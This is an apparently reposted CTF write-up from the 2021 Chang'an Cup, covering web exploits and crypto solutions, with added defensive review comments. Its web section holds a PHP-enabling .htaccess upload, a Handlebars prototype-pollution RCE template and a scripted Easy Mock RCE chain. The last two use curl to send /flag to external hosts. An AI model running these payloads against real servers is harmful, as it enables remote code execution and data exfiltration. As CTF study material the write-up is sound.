2021长安杯|Web & Crypto 部分wp合集

admin 2021年9月24日10:25:50评论554 views字数 7816阅读26分3秒阅读模式


web方向


K1ng_in_h3Ap_I







1. noupload

上传点只放行 png 和 .htaccess 两类文件。放行 .htaccess 是问题所在:上传者可以借它改写上传目录的 Apache 配置。防御上应拒绝以点开头的文件名,并对上传目录设置 AllowOverride None。
# Uploaded .htaccess from the write-up, restored to one directive per line.
# The <Files> block re-opens access to names matching "^.ht" and turns the PHP
# engine on for them; SetHandler then has files in this directory handled as
# PHP. The final line is a comment to Apache but contains a PHP short tag.
# NOTE(review): this only takes effect where per-directory overrides are
# honoured. Hardening: set "AllowOverride None" on upload directories, reject
# dot-files in the upload filter, and store uploads outside the document root.
<Files ~ "^.ht">
    Require all granted
    Order allow,deny
    Allow from all
    php_flag engine on
</Files>
SetHandler application/x-httpd-php
# <?=`cat /flag` ?>


2.  SimpleHub

Status 字段的内容可控,可以借 {{this.constructor}} 污染原型,对应 Handlebars 的已知漏洞(见下方 Snyk 公告):
https://snyk.io/vuln/SNYK-JS-HANDLEBARS-1056767


{{!--
  Template submitted through the Status field, kept exactly as published.
  First part: looks up the __proto__ getter and redefines hasOwnProperty on the
  prototype. Second part: assembles a JavaScript string that loads
  child_process and runs curl, which sends the content of /flag in the
  User-Agent header to an external host.
  NOTE(review): it appears to follow the proof of concept in the Snyk advisory
  linked above - confirm against the advisory.
  Defensive reading: never compile user-supplied strings as templates, upgrade
  handlebars to a release the advisory lists as fixed, and alert on the web
  process spawning child processes or making unexpected outbound HTTP requests.
--}}
{{#with (__lookupGetter__ "__proto__")}} {{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} {{#with ../constructor.prototype}} {{../../constructor.defineProperty . "hasOwnProperty" ..}} {{/with}} {{/with}} {{/with}} {{#with "constructor"}} {{#with split}} {{pop (push "global.process.mainModule.constructor._load('child_process').exec('curl -X POST -A `cat /flag` http://fto41s.ceye.io);")}} {{#with .}} {{#with (concat (lookup join (slice 0 1)))}} {{#each (slice 2 3)}} {{#with (apply 0 ../..)}} {{.}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}}


3.  EasyMock

import requests
import json
import random
import string

# Base URL of the challenge instance; every request below is built by
# appending a path to this value.
target = ' http://0c1b8228.yunyansec.com/'

# Throw-away account: random.sample draws 8 distinct characters for each value.
alphabet = string.ascii_letters + string.digits
username = ''.join(random.sample(alphabet, 8))
password = ''.join(random.sample(alphabet, 8))
print(username)
print(password)

# can't see the result of command
# The command output is never returned to the client, so the write-up has the
# server send the flag in the path of a request to an external listener.
# For defenders, an outbound HTTP request from the mock server to an
# unfamiliar host is the observable signal.
cmd = 'curl http://118.25.154.15:9999/`cat /flag`'
# register
# Creates the throw-away account. The request carries no valid credential
# ("Bearer undefined"), so this step depends on the instance allowing open
# self-registration. The response is not checked.
url = target + "/api/u/register"
cookies = {"SSO_LANG_V2": "EN"}
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/json;charset=utf-8",
    "Authorization": "Bearer undefined",
    "Origin": "http://127.0.0.1:7300",
    "Connection": "close",
    "Referer": "http://127.0.0.1:7300/login",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Cache-Control": "max-age=0",
}
json_data = {"name": username, "password": password}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# login
# Signs in with the account created above and keeps the session token that
# the API returns under data.token. There is no status check: a failed login
# surfaces as a KeyError/TypeError on the last line.
url = target + "/api/u/login"
cookies = {"SSO_LANG_V2": "EN"}
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101Firefox/90.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/json;charset=utf-8",
    "Authorization": "Bearer undefined",
    "Origin": "http://127.0.0.1:7300",
    "Connection": "close",
    "Referer": "http://127.0.0.1:7300/login",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Cache-Control": "max-age=0",
}
json_data = {"name": username, "password": password}
req = requests.post(
    url,
    headers=headers,
    cookies=cookies,
    json=json_data,
).text
login = json.loads(req)
token = login['data']['token']
# create project
# Creates a project named after the random username; the token is sent both
# as the easy-mock_token cookie and as a Bearer header. A freshly registered
# account is enough to reach this endpoint.
url = target + "/api/project/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/json;charset=utf-8",
    "Authorization": "Bearer " + token,
    "Origin": "http://127.0.0.1:7300",
    "Connection": "close",
    "Referer": "http://127.0.0.1:7300/new",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
}
json_data = {
    "description": "just a poc",
    "group": "",
    "id": "",
    "members": [],
    "name": username,
    "swagger_url": "",
    "url": "/" + username,
}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# get project_id
# Lists the account's projects and takes the _id of the first entry.
# NOTE(review): assumes the project created just before is entry 0 of the
# list - true for a fresh account, not verified by the script.
url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Authorization": "Bearer " + token,
    "Connection": "close",
    "Referer": "http://127.0.0.1:7300/login",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
}
req = requests.get(url, headers=headers, cookies=cookies).text
projects = json.loads(req)
project_id = projects['data'][0]['_id']
# NOTE(review): the statement run below is reproduced exactly as extracted. The
# page collapsed it onto one line behind the leading "#", and the JavaScript
# held in "mode" lost its backslash escapes, so it is not valid Python as shown.
# What it does: POSTs a mock definition to /api/mock/create whose 'name' field
# is a JavaScript function. That function provokes an exception, uses the error
# object to reach the host `process`, and passes `cmd` to child_process.
# Defensive reading: the function body is evidently evaluated server-side when
# the mock is requested, so any self-registered user can run code on the host.
# Treat mock definitions as untrusted code: disable function evaluation or run
# it in an isolated, unprivileged process, and alert when the mock service
# spawns child processes.
# create mockurl = target + "/api/mock/create"cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}json_data={"description": "poc", "method": "get", "mode": "{n 'foo': 'Syntax Demo',n 'name': function() {n return (function() {n TypeError.prototype.get_process = f => f.constructor("return process")();n try {n Object.preventExtensions(Buffer.from("")).a = 1;n } catch (e) {n return e.get_process(() => {}).mainModule.require("child_process").execSync("" + cmd + "").toString();n }n })();n }n}", "project_id": project_id, "url": "/" + username}requests.post(url, headers=headers, cookies=cookies, json=json_data)
# preview mock
# Requests the stored mock once. This GET is the step that makes the server
# evaluate the mock definition; the response body is ignored.
mock_path = "/mock/{}/{}/{}".format(project_id, username, username)
url = target + mock_path
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0",
    "Accept": "application/json, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://127.0.0.1:7300" + mock_path,
    "Content-Type": "application/json",
    "Connection": "close",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Cache-Control": "max-age=0",
}
requests.get(url, headers=headers, cookies=cookies)





crypto方向





1.  EzPy

先把每个分组按 20 进制转回整数,再在模 256 下乘以 233 的逆元,即可还原出对应的字符。

密文里每个分组是一位还是两位 20 进制数字没有分隔信息,只能手工逐个判断。

from Crypto.Util.number import inverse

# Ciphertext groups, already split by hand into one- or two-digit base-20
# numbers (digits 0-9 then A-J).
dd = [
    '4A', '65', '8B', '0F', '5J', '44', '5J', '2A', '3D', '2A', '1D', '5J',
    '17', '88', '3D', '7D', '7D', 'BH', '1A', '9B', 'BH', '5J', '78', '7',
    '5J', 'C0', '9E', '3D', '17', '78', '75', '17', 'BH', '5J', '2A', '3D',
    '8B', '75', '17', '5J', '3D', '3G', '9B', '7', '9E', '75', '78', '88',
    '2D', '5J', '3D', '1A', '4', '5J', '4', 'BH', '2D', '8G', '1A', '8B',
    '78', '9E', '3D', '78', 'BH', '5J', '3D', '1A', '5J', '8G', '52', 'BH',
    '9E', 'AE', '3G', '7', '3J', '5J', '75', '1A', '5J', 'CE', '65', '2D',
    'A8', '1D',
]

# The decoding multiplies each value by the inverse of 233 modulo 256, which
# is 89. A single fixed multiplier is an affine byte substitution, not
# encryption: anyone who knows or guesses the constant can invert it.
inv_233 = inverse(233, 256)
flag = "".join(chr(int(group, 20) * inv_233 % 256) for group in dd)
print(flag)


2.  checkin

已知 x = pow(2,e,n),所以 2^e - x 是 n 的倍数 kn。先爆破出其中的小素因子 p 得到 kq,再分解 kq 得到 q,完成 RSA 解密,最后用威尔逊定理还原明文。注意下面脚本里的变量名与此相反:q 是爆破出的 16 位小因子,p 是用 yafu 分解出的大因子。

from Crypto.Util.number import *

# Challenge values: public exponent, the leaked x = pow(2, e, N) and the
# ciphertext.
e = 1049
x = 4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377
c = 3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270

# 2**e - x is a multiple of the real modulus, not the modulus itself. With an
# exponent this small the power can be written out in full, so publishing x
# reveals that multiple.
n = pow(2, e) - x

# Scan the 16-bit range for a factor. If none divides n, q ends at 2**16 - 1,
# exactly as the last value of a for-loop over the same range would.
q = 2**15
while n % q != 0 and q < 2**16 - 1:
    q += 1

p = n // q  # cofactor, still carries the unknown multiplier; replaced below
# yafu
p = 170229264879724117919007372149468684565431232721075153274808454126426741324966131188484635914814926870341378228417496808202497615585946352638507704855332363766887139815236730403246238633855524068161116748612090155595549964229654262432946553891601975628848891407847198187453488358420350203927771308228162321231

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
# n is a multiple of p*q, and everything after this line is reduced mod p, so
# working modulo n here gives the same final value.
m = pow(c, d, n)

# Multiply by (p-q) * ... * (p-1) and negate. By Wilson's theorem this equals
# dividing m by (p-q-1)! modulo p.
# NOTE(review): presumably the challenge multiplied the plaintext by that
# factorial before encrypting - its source is not shown on this page.
for i in range(p - q, p):
    m = (m * i) % p
print(long_to_bytes(-m % p))



- END -
  • 本文由 发表于 2021年9月24日10:25:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2021长安杯|Web & Crypto 部分wp合集https://cn-sec.com/archives/555298.html
